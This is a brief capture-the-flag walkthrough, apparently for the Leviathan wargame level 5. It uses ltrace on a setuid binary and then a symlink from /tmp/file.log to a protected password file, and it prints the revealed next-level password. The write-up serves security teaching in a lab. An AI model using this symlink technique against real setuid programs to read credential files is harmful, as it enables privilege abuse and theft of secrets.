Level 05
Publ .
Mins 1 (98 words).
Edit .
Testing the the found setuid file
$ ./leviathan5
Cannot find /tmp/file.log
ltrace
Whereas the output of strace yielded no useful information about the
executable, the output for ltrace, showed:
leviathan5@gibson:~$ ltrace ./leviathan5
__libc_start_main(0x8049206, 1, 0xffffd5f4, 0 <unfinished ...>
fopen("/tmp/file.log", "r") = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log) = 26
exit(-1 <no return ...>
+++ exited (status 255) +++
fopen() is unable to find the file is coded to read. You are able to write to
/tmp, thus, creating a symlink to the password file, should allow you to read
it:
$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
$ ./leviathan5
YZ55XPVk2l